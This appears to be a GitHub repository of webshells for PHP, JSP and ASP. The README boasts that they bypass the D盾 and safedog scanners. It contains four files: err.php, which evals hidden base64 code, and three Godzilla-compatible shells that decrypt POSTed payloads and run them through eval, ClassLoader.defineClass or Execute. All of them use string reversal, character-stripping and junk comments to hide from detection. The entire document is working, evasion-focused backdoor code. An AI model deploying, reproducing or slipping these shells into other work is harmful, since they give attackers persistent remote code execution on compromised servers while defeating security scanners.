├── README.md
├── err.php
├── godzilla_aes_base64.jsp
├── godzilla_xor_base64.asp
└── godzilla_xor_base64.php


/README.md:
--------------------------------------------------------------------------------
1 | # php_jsp_asp_webshell
2 | php webshell bypass D盾、safedog，仅支持php7
3 | 
4 | jsp未过河马
5 | 


--------------------------------------------------------------------------------
/err.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | @ini_set('output_buffering',0);@ini_set('display_errors', 0);@ini_set('output_buffering',0);@ini_set('display_errors', 0);
 3 | try{
 4 | function m(){
 5 | $a = "sfdtfdrf";
 6 | $b = "d_fdrfdefdpf";
 7 | return str_replace("fd", "", $a.$b."dlfdafdcfde");
 8 | }
 9 | $c = time();
10 | $d = $c;
11 | if($c/$d-1===1 || !isset($_GET['c'])){
12 | 	echo 'Error in page';
13 | }else{
14 | 	throw new Exception($err, 114);
15 | }
16 | }catch(Exception $e){
17 | $f = "fU0leVSVkVS";
18 | $g = "IEBldmFsKCR";
19 | $h = "WydIVFRQX0F";
20 | $i = "DQ0VleQVCddKTs=";
21 | $j = m();
22 | $k  = $j("z", "", "zbazsze64"."_zdzeczodze");
23 | $l = $j("p", "", "pcprpepaptpe_fp"."upnpcptpipopn");
24 | $z = $l('', $k( $j( "le", "", $g . $f . $h . $i)));
25 | for($i=1;$i<=2;$i=$i+2){$z();}}


--------------------------------------------------------------------------------
/godzilla_aes_base64.jsp:
--------------------------------------------------------------------------------
 1 | <%!
 2 | public static String rs(String s){
 3 |     String r = "";
 4 |     int length = s.length();
 5 |     for (int i = 0; i < length; i++){
 6 |         r = s.charAt(i) + r;
 7 |     }
 8 |     return r;
 9 | }
10 | int abcd=114514;
11 | String xc=rs("a84c543b58205123");
12 | String pass=rs("411drowssap");
13 | String k=md5(pass+xc);
14 | class X extends ClassLoader{
15 |     public X(ClassLoader z){
16 |         super(z);
17 |     }public Class Q(byte[] cb){
18 |         if(abcd==abcd){}
19 |         return super.defineClass(cb, 0, cb.length);
20 |     }
21 | }
22 | public byte[] x(byte[] s,boolean m){
23 |     try{
24 |         javax.crypto.Cipher c=javax.crypto.Cipher.getInstance(rs("SEA"));
25 |         c.init(m?1:2, new javax.crypto.spec.SecretKeySpec(xc.getBytes(),rs("SEA")));
26 |         return c.doFinal(s);
27 |         }catch (Exception e){return null; }}
28 | public static String md5(String s) {
29 |     String ret = null;
30 |     try {
31 |         java.security.MessageDigest m;
32 |         m = java.security.MessageDigest.getInstance(rs("5DM"));
33 |         m.update(s.getBytes(), 0, s.length());
34 |         ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();
35 |     } catch (Exception e) {}
36 |     return ret;
37 | }
38 | public static String base64Encode(byte[] bs) throws Exception {
39 | Class base64;
40 | String value = null;
41 | try {
42 |     value = (String)java.util.Base64.getEncoder().encodeToString(bs);
43 | } catch (Exception e) {
44 | try {
45 | base64=Class.forName(rs("redocnE46ESAB.csim.nus"));
46 | Object Encoder = base64.newInstance();
47 | value = (String)Encoder
48 | .getClass().getMethod("encode", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });
49 | } catch (Exception e2) {}}
50 | return value;
51 | } public static byte[] base64Decode(String bs) throws Exception {
52 |     Class base64;
53 |     byte[] value = null;
54 |     try {
55 |         value = (byte[])java.util.Base64.getDecoder().decode(bs);
56 |     } catch (Exception e) {
57 |     try {
58 |         base64=Class.forName(rs("redoceD46ESAB.csim.nus"));
59 |         Object decoder = base64.newInstance();
60 |         value = (byte[])decoder.getClass()
61 |         .getMethod("decodeBuffer", new Class[] { String.class }).invoke(decoder, new Object[] { bs });
62 |     } catch (Exception e2) {}}return value;
63 | }
64 | %><%
65 | if (request.getMethod().equals("POST") && abcd==abcd){
66 | try{
67 |     byte[] data=base64Decode(request/*jjHnw`]}D`|PI\\7rv?EgvYYwC&9~P"]sh,?:0S&)wu>mQ\'?\'qzP{3*/
68 |     .getParameter(pass));
69 |     data=
70 |     x(data, false);
71 |     if (session
72 |     .getAttribute(rs("daolyap"))==null){
73 |         ClassLoader contextClassLoader = Thread.currentThread().getContextClassLoader();
74 |     session
75 |     .setAttribute(rs("daolyap"), new X(contextClassLoader).Q(data));
76 |     }else{/*T0+MdQ{piLt\\wkMzHIc2UxY'vm#Pm?_]1*/
77 |     request/*{(fEyp)RS>#yQCtQa;=UBv#h~J*/
78 |     .setAttribute(rs("sretemarap"),data);
79 |     java.io.ByteArrayOutputStream ao=
80 |     new java.io.ByteArrayOutputStream();
81 |     Object f=/*r=wnIo}DH3EV5d.y+:,g#L{m>pa}b-usUjpy9#95CliAW[NP602XxZ;@xo~v-K46r4\\'VbJ*/
82 |     ((Class)session.getAttribute(rs("daolyap")))/*Y7-!~&CI}pVO\\3LQdLRCWM2Obo\\*/
83 |     .newInstance();
84 |     if(abcd==114514){/*I"DO&{iM~c7|3Mo-7|9\'<egBwY_Xeiu+QB}qk\'$QLiO@g.F]iG8(\'W.FRu0T;~X"CXE@=}oM2i5%SH~-.N&*/
85 |     f.equals(ao);
86 |     if(abcd==abcd && abcd == abcd){
87 |     f.equals(pageContext);
88 |     response.getWriter()
89 |     .write(k.substring(0,16));
90 |     f.toString();}
91 |     response
92 |     .getWriter().write(base64Encode(x(ao/*~O4&M88Pl7X7*X{{stxPsqXgX.{E:x]6~'qGTqvBzOb>ft7)x3%=<_t-]d;F@,;\\K9a~W<1+\\W^*/
93 |     .toByteArray(), true)));
94 |     response.getWriter().write(k.substring(16));
95 |     }}
96 | }catch (Exception e){}}%>


--------------------------------------------------------------------------------
/godzilla_xor_base64.asp:
--------------------------------------------------------------------------------
 1 | <%
 2 | Set bypassDictionary = Server.CreateObject("Scripting.Dictionary")
 3 | Function rs(ips)
 4 |     Dim rss
 5 |     rss = ""
 6 |     For i = Len(ips) To 1 Step -1
 7 |         rss = rss & Mid(ips, i, 1)
 8 |     Next
 9 |     rs = rss
10 | End Function
11 | Function Base64Decode(ByVal vCode)
12 |     Dim oXML, oNode
13 |     Set oXML = CreateObject(rs("0.3.tnemucoDMOD.2lmxsM"))
14 |     Set oNode = oXML.CreateElement(rs("46esab"))
15 |     oNode.dataType = rs("46esab.nib")
16 |     oNode.text = vCode
17 |     Base64Decode = oNode.nodeTypedValue
18 |     Set oNode = Nothing
19 |     Set oXML = Nothing
20 | End Function
21 | Function decryption(content,isBin)
22 |     dim size,i,result,keySize
23 |     keySize = len(key)
24 |     Set BinaryStream = CreateObject(rs("maertS.BDODA"))
25 |     BinaryStream.CharSet = "iso-8859-1"
26 |     BinaryStream.Type = 2
27 |     BinaryStream.Open
28 |     if IsArray(content) then
29 |         size=UBound(content)+1
30 |         For i=1 To size
31 |             BinaryStream.WriteText chrw(ascb(midb(content,i,1)) Xor Asc(Mid(key,(i mod keySize)+1,1)))
32 |         Next
33 |     end if
34 |     BinaryStream.Position = 0
35 |     if isBin then
36 |         BinaryStream.Type = 1
37 |         decryption=BinaryStream.Read()
38 |     else
39 |         decryption=BinaryStream.ReadText()
40 |     end if
41 | End Function
42 |     key="32150285b345c48a"
43 |     content=request.Form(rs("411drowssap"))
44 |     if not IsEmpty(content) then
45 | 
46 |         if  IsEmpty(Session(rs("daolyap"))) then
47 |             content=decryption(Base64Decode(content),false)
48 |             Session(rs("daolyap"))=content
49 |             response.End
50 |         else
51 |             content=decryption(Base64Decode(content),true)
52 |             bypassDictionary.Add rs("daolyap"),Session(rs("daolyap"))
53 |             Execute(bypassDictionary(rs("daolyap")))
54 |             result=run(content)
55 |             response.Write(rs("e6f65b"))
56 |             if not IsEmpty(result) then
57 |                 response.Write Base64Encode(decryption(result,true))
58 |             end if
59 |             response.Write(rs("bfb66d"))
60 |         end if
61 |     end if
62 | %>
63 | 


--------------------------------------------------------------------------------
/godzilla_xor_base64.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | @session_start();
 3 | @set_time_limit(0);
 4 | @error_reporting(0);
 5 | function ee($D,$K){
 6 |     for($i=0;$i<strlen($D);$i++) {
 7 |         $c = $K[$i+1&15];
 8 |         $D[$i] = $D[$i]^$c;
 9 |     }
10 |     return $D;
11 | }
12 | function r(){
13 | $a = "sfdtfdrf";
14 | $b = "d_fdrfdefdpf";
15 | return str_replace("fd", "", $a.$b."dlfdafdcfde");
16 | }
17 | $pass='password114';
18 | $payloadName='payload';
19 | $key='32150285b345c48a';
20 | //$key='1145141919810'
21 | try{
22 | $c = time();
23 | $d = $c;
24 | if($c/$d-1===1 || !isset($_POST[$pass])){
25 | 	echo 'Error in page';
26 | }else{
27 | 	throw new Exception($err, 114);
28 | }
29 | }catch(Exception $e){
30 | if (isset($_POST[$pass])){
31 |     $data=ee(base64_decode($_POST[$pass]),$key);
32 |     if (isset($_SESSION[$payloadName])){
33 |         $payload=ee($_SESSION[$payloadName],$key);
34 |         if (strpos($payload,"getBasicsInfo")===false){
35 |             $payload=ee($payload,$key);
36 |         }
37 |         $re = r();
38 |         $k  = $re("z", "", "zbazsze64"."_zdzeczodze");
39 |         $l = $re("p", "", "pcprpepaptpe_fp"."upnpcptpipopn");
40 |         $f = $l('$payload', $k('ZXZhbCgkcGF5bG9hZCk7'));
41 |         $f($payload);
42 |         echo substr(md5($pass.$key),0,16);
43 |         echo base64_encode(ee(@run($data),$key));
44 |         echo substr(md5($pass.$key),16);
45 |     }else{
46 |         if (strpos($data,"getBasicsInfo")!==false){
47 |             $_SESSION[$payloadName]=ee($data,$key);
48 |         }
49 |     }
50 | }
51 | }


--------------------------------------------------------------------------------